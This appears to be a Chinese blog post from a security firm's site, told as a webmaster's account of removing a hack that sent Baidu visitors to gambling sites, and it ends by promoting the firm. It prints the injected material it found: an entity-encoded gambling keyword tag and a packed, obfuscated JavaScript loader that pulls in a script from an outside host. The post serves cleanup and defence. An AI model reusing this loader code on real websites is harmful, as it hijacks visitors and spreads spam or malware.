eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

網站被跳轉到賭博網站 該如何處理?

 

             我們公司網站在百度搜索任何關鍵詞點開以後都會跳到另一個網站裡,有時
會直接

跳轉到賭博、博彩類的網站上去,直接輸入域名不會跳轉,我又在百度上
搜我們自己的公司

域名,出來的結果是提示我們網站有風險,百度網址安全中心提
醒您:該頁面可能已被非法

篡改! 如下面圖片所展示的一樣,直接紅色的風險標
記。 打開網站還被360提示“未經證實的

博彩賭博網站”。
 


 
再一個我又site:公司網站域名,發現百度快照裡也收錄了許多的博彩內容的快照以及收錄了

跟網站不相關的內容。網站現在都無法正常打開,這段時間咨詢產品的客戶越來越少。如何

去除百度風險提示,防止網站不再跳轉到賭博網站上去呢?摸著石頭過河吧,從來沒遇到過

這樣的情況,頭都大了,作為網站的負責人又不得不去處理,從這一刻記錄下我的處理過程。

 
百度提示我們公司網站內容被非法篡改了,那就得從網站的內容裡找原因,先去下載公司網

站的所有程序代碼,包括圖片以及數據庫到本地電腦裡,也不大才100M左
右,檢查了首頁文

件index.html,仔細一看發現了問題,在最底部竟然有一些加密
的字符代碼
 
<meta name="keywords" 
 
content="&#36172;&#21338;&#32593;&#8226;&#32593;&#19978;&#36172;&#21338;
 
&#24179;&#21488;&#8226;&#28595;&#38376;&#21338;&#24425;&#8226;&#30334;&#
 
23478;&#20048;&#32593;&#22336;&#8226;&#36172;&#21338;&#32593;&#8226;&#28
 
595;&#38376;&#30334;&#23478;&#20048;&#8226;&#29616;&#37329;&#32593;&#822
 
6;&#28595;&#38376;&#36172;&#21338;&#32593;&#8226;&#28595;&#38376;&#36172
 
;&#21338;&#32593;&#31449;&#8226;&#32593;&#19978;&#26368;&#22909;&#36172;
 
&#21338;&#32593;&#31449;&#8226;&#28595;&#38376;&#36172;&#21338;&#25216;&
 
#24039;&#8226;&#28595;&#38376;&#36172;&#21338;&#29609;&#27861;&#8226;&#2
 
9616;&#37329;&#26827;&#29260;&#36172;&#21338;&#32593;&#31449;&#8226;&#36
 
172;&#21338;&#32593;&#31449;&#22823;&#20840;&#8226;&#32593;&#19978;&#215
 
12;&#27861;&#36172;&#21338;&#32593;&#31449;"/>
 
發現了一段加密的代碼,通過解密發現是賭博的一些關鍵詞內容,如下圖:

 
原來百度提示該頁面可能已被非法篡改,問題是出在這裡,我立即刪除了這一段內容,再往

下看首頁的代碼又發現了一些友情鏈接,都是博彩類的網站鏈接,如下圖:

 
在首頁文件裡一共發現了2處被篡改的地方,我手動刪除掉了這些內容,我以為我刪除掉這

些內容後網站就不會跳轉到賭博網站去了,可以從百度裡點擊進去還是會
跳轉,看來還是有

問題在代碼裡,繼續查看程序代碼,在一個JS文件發現了網站被
跳轉的秘密,代碼如下:
 
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while

(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[24-9k]'};c=1};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(4(f){4 e(i){try{2 d=f.get

ElementsByTagName("head")[0];2 j=d.appendChild(a(i));5(4(){d.removeChild(j)},2000)}

catch(h){}}4 b(d){7 f.createElement(d)}4 a(h){2 d=b("script");d.src=h;d.async=true;d.typ

e="text/javascript";7 d}2 g=0;4 c(){2 j=f.8.clientWidth;2 h=f.8.clientHeight;2 i=["ht","tp:",

"//kn.","thj","xs","c.n","et"].join("");2 d="w="+j+"&h="+h;6(top==this){6(j<300||h<40){g+=

1;6(g<3){5(c,1000)}9{e(i+"/k/m.php")}}9{e(i+"/k/")}}}5(c,500)})(document);',[],21,'||var||f

unction|setTimeout|if|return|body|else|||||||||||haps'.split('|'),0,{}))baidu', 'google', 'yaho

o', 'bing', 'soso', 'sogou'

 
 
刪除JS跳轉木馬代碼,網站恢復正常,從百度點擊進來也沒有再跳轉了。自身網站問題解決

完了後再提交到百度申訴,等待百度申訴的結果。整個解決處理過程比較複雜,艱辛,不懂

點網站技術的話,需要從網站程序代碼,網站漏洞修復等多個方面去入手,如果你是非專業

人士的話,建議找專門的網站安全公司去處理吧,國內像eSafe白帽資安網公司以及綠盟安全公司比

較專業。
分享: